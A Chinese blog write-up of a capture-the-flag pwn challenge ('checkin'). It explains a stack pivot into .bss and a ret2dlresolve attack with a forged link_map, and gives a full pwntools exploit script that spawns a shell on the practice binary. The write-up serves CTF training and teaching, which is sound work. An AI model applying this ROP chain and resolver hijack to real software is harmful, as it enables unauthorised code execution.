2022DASCTF X SU 三月春季挑战赛checkin(栈迁移,ret2dl)

已于 2022-09-26 18:29:42 修改
阅读量384 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-09-26 18:04:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127051527
版权

2022DASCTF X SU 三月春季挑战赛checkin


找了一道今年三月的复习一下ret2dl,结果栈迁移把我难倒了,仅能溢出0x10的栈迁移。题目可在buuctf竞赛中心里找。

程序分析:

程序只有一个read,只能溢出0xb0-0xa0个字节
请添加图片描述
没有canary,且Partial RELRO
请添加图片描述
考虑栈迁移到bss段,然后ret2dl

栈迁移逐步解析:

前置知识:
leave相当于汇编 mov rsp,rbp;pop rbp;
ret相当于汇编pop eip;
pop时看的是esp所指向的位置

我们先溢出覆盖rbp为bss+0x300+0xa0
ret为main_read_addr

程序执行leave:
mov rsp,rbp---->rsp=old_rbp 也就是栈的地址
pop rbp---------->rbp=bss+0x300+0xa0,rsp=rsp=old_rbp+8
程序执行ret:
回到main的read处
可再次输入

main_read_addr=0x4011BF
main=0x401156
pay1='a'*0xa0+p64(bss+0x300+0xa0)+p64(main_read_addr)
se(pay1)

先ret2csu取rop一个read往fake_linkmap_addr-0x40处写0x200字节,返回到main,然后填满至0xa0,溢出覆盖rbp为bss+0x300
覆盖ret为leave_ret

现在我们rbp=bss+0x300+0xa0,rsp=rsp=old_rbp+8
程序执行leave:
mov rsp,rbp---->rsp=bss+0x300+0xa0
pop rbp---------->rbp=bss+0x300-8,rsp=bss+0x300+0xa0+8
程序执行ret:(我们已经覆盖为leave;ret;)
也就是再次执行leave;ret;
程序再次执行leave:
mov rsp,rbp---->rsp=bss+0x300-8
pop rbp---------->rbp=(bss+0x300-8处的值,没有用处),rsp=bss+0x300
程序再次执行ret:
就是执行bss+0x300处的rop链,然后会返回main

payload=csu(0,fake_linkmap_addr-0x40,0x200,elf.got['read'])
payload+=p64(main)
payload = payload.ljust(0xa0,'\x00')
payload += p64(bss+0x300-8)
payload += p64(leave_ret)
se(payload)

接下来就是会能写0x200字节到fake_linkmap_addr-0x40处
设定fake_linkmap_addr=fake_linkmap_addr=elf.bss()+0x700+0x8

payload=csu(0,fake_linkmap_addr-0x40,0x200,elf.got['read'])
payload+=p64(main)
payload = payload.ljust(0xa0,'\x00')
payload += p64(bss+0x300-8)
payload += p64(leave_ret)
se(payload)

我们这边在fake_linkmap_addr-0x40处开始写rop链,到fake_link_map_addr处刚好写入的是fake_link_map结构体
摆好参数,会调用dlsolve函数解析为system(‘/bin/sh’)

pop_rsi_r15=0x401251
payload=p64(pop_rsi_r15)+p64(0)+p64(0)+p64(pop_rdi)+p64(fake_linkmap_addr+0x48)+p64(dlsolve)+p64(fake_linkmap_addr)+p64(0)+fake_link_map
se(payload)

结束后会返回到main,这么填,效果就是
执行fake_linkmap_addr-0x40开始的代码

se('a'* 0xa0 + p64(fake_linkmap_addr-0x48) +p64(leave_ret))

成功getshell
在这里插入图片描述

exp:

from pwn import * 
local_file  = './checkin'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26376 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
def fake_Linkmap_payload(fake_linkmap_addr,known_func_ptr,offset):
    linkmap = p64(offset & (2 ** 64 - 1))#l_addr
    #dyn_relplt
    linkmap += p64(0)
    linkmap += p64(fake_linkmap_addr + 0x18)
    #relplt
    linkmap += p64((fake_linkmap_addr + 0x30 - offset) & (2 ** 64 - 1))
    linkmap += p64(0x7)
    linkmap += p64(0)

    linkmap += p64(0)#l_ns
    #dyn_symtab
    linkmap += p64(0)
    linkmap += p64(known_func_ptr - 0x8)
    
    linkmap += b'/bin/sh\x00'
    
    linkmap = linkmap.ljust(0x68,b'A')
    linkmap += p64(fake_linkmap_addr)#fake_linkmap+0x68
    linkmap += p64(fake_linkmap_addr + 0x38)#fake_linkmap+0x70
    linkmap = linkmap.ljust(0xf8,b'A')
    linkmap += p64(fake_linkmap_addr + 0x8)#fake_linkmap+0xf8
    return linkmap

def csu(rdi,rsi,rdx,function):
    csu_front_addr=0x401230
    csu_end_addr=0x40124a
    payload = ''
    payload += p64(csu_end_addr) + p64(0) + p64(1) + p64(rdi) + p64(
        rsi) + p64(rdx) + p64(function)
    payload += p64(csu_front_addr)
    payload += 'a' * 0x38
    return payload

#-----------------------------------------------------
fake_linkmap_addr=elf.bss()+0x700+0x8
known_func_ptr=elf.got['read']
offset=libc.sym['system']-libc.sym['read']
fake_link_map=fake_Linkmap_payload(fake_linkmap_addr,known_func_ptr,offset)
#-------------------------------
pop_rdi=0x401253
dlsolve=0x401026
leave_ret=0x4011e2 
#ROPgadget --binary ./checkin|grep "leave"
ret=0x40101a
bss=elf.bss()
#----------------------------------------------------------
main_read_addr=0x4011BF
main=0x401156
pay1='a'*0xa0+p64(bss+0x300+0xa0)+p64(main_read_addr)
se(pay1)
#---------------------------------
payload=csu(0,fake_linkmap_addr-0x40,0x200,elf.got['read'])
payload+=p64(main)
payload = payload.ljust(0xa0,'\x00')
payload += p64(bss+0x300-8)
payload += p64(leave_ret)
se(payload)
#----------------------------
pop_rsi_r15=0x401251
payload=p64(pop_rsi_r15)+p64(0)+p64(0)+p64(pop_rdi)+p64(fake_linkmap_addr+0x48)+p64(dlsolve)+p64(fake_linkmap_addr)+p64(0)+fake_link_map
se(payload)
#debug()
#-------------------------------------
se('a'* 0xa0 + p64(fake_linkmap_addr-0x48) +p64(leave_ret))
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4596
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
二进制专项之babyRE
最新发布
qq_41853048的博客
06-06 239
昨天没弄出来,有反调试和异常,一直找不到主要加密区域。
2023西湖论剑RE--BabyRE
qq_61670993的博客
03-05 553
小菜鸡一枚
2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1519
DASCTF
DASCTF NOV - re - babytea - writeup
Air_cat的博客
11-28 504
DASCTF NOV X联合出题人2022年度积分榜争夺赛逆向题babytea的writeup
v2ex-checkin:V2ex签到
03-04
步骤2设置Cookie fork完成之后进去之后依次单击秘密----新秘密单击之后名称输入V2EXCK值输入你的v2ex cookie完成后单击添加秘密同理再添加一个qmagapi名称是QMSGAPI值是你的api 步骤3启用动作 点击操作,再点击我...
Checkin_SFTP_Edit2_batcheckin_sftp_
09-28
标题"Checkin_SFTP_Edit2_batcheckin_sftp_"暗示了这是一个关于使用批处理脚本来进行SFTP文件检查入(check-in)的升级版流程。在软件开发和版本控制中,"checkin"通常指的是将代码或文件提交到版本控制系统的过程。...
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
ClearCase服务器数据迁移方案
11-13
《ClearCase服务器数据迁移方案详解》 在IT领域,数据迁移是一项至关重要的任务,尤其是在使用像Rational ClearCase这样的版本控制系统时。ClearCase是IBM推出的一款强大的软件配置管理工具,广泛应用于大型企业。...
CTF逆向-[SCTF2019]babyre-WP_简单去花指令和流程识别
serfend's blog
03-24 4515
CTF逆向-[SCTF2019]babyre-WP_简单去花指令和流程识别 来源:https://buuoj.cn/ 内容:无 附件:https://pan.baidu.com/s/1pWTpezTXnr_NN4lY9xWzag?pwd=m2zv 提取码:m2zv 答案:flag{ddwwxxssxaxwwaasasyywwdd-c2N0Zl85MTAy(fl4g_is_s0_ug1y!)} 总体思路 发现汇编中出现有红色部分,则说明反汇编失败,通常是有花指令或者说SMC(程序自己修改自己的代码)。 去除
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 771
2022DASCTF X SU 三月春季挑战赛 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
2022DASCTF X SU 三月春季挑战赛
qq_53263789的博客
03-30 820
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
2022DASCTF X SU 三月春季挑战赛 web复现
akxnxbshai的博客
06-12 1001
2022DASCTF X SU 三月春季挑战赛复现一下。
[DASCTF 2022]三月赛 web 复现
cosmoslin的博客
03-29 6499
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
2021-DASCTF-三月赛-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
DASCTF
qq_53755216的博客
04-08 790
ez_serialize 题目网址: http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/ <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $thi
DASCTF安恒三月赛re部分复现
m0_51357657的博客
03-28 467
Drinksometea 题目给了exe和一个tea.png.out(加密完生成的文件),哇这个第一题做了我一天啊。。。已知是tea就卡在不会文件读写是真的难受住了呜呜呜呜 逻辑是很清晰的,CreateFile,ReadFile 这些句柄可自行百度,理解是在干什么即可(但要是要像我一样想仿着这个写个C++脚本逆回去。。。。就各种报错。。。一言难尽了。。wtcl) 关键就在loc_4010A0的位置,但是不能F5,因为加了花指令 哇今天最大的收获就是k1ee师傅给一步步教的去花(感谢!! Undefine+
2022DASCTF X SU 三月春季挑战赛 checkin ROPgadget进阶使用
qq_65147345的博客
07-17 227
1. 迁移至bss段 2. 泄露libc地址,将setvbuf改写成puts,将rdi内容改写成read_got,从而泄露libc 3. 再次通过read函数执行system
2022DASCTF X SU Re WriteUp
Whitebird的博客
04-01 1063
2022DASCTF X SU Re WriteUpeasyreStarGate easyre 一道签到题,老样子先查壳 asp壳比较容易脱,可以百度了解一下,我直接通过ESP定律脱的,然后把内存dump下来用IDA分析 通过字符串定位来到加密函数,下面的v2数组是密文,str数组是我们输入的flag,分析了一下sub_401500、sub_40152B、sub_401593,是一个变种的RC4. 如果是正常RC4,我们可以用脚本或者网站解,变种虽然也可以硬逆,但是比较麻烦。我这里是直接动调出密钥流,R
迁移软件资产到ClearCase UCM:实战经验分享
3. **统一变更管理(UCM)**:UCM是ClearCase中的一个重要特性,它提供了一种统一的方式来跟踪和管理开发过程中的所有变更,包括Checkout、CheckIn、添加到源控制等操作,这些操作都会关联到一个活动(Activity)。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值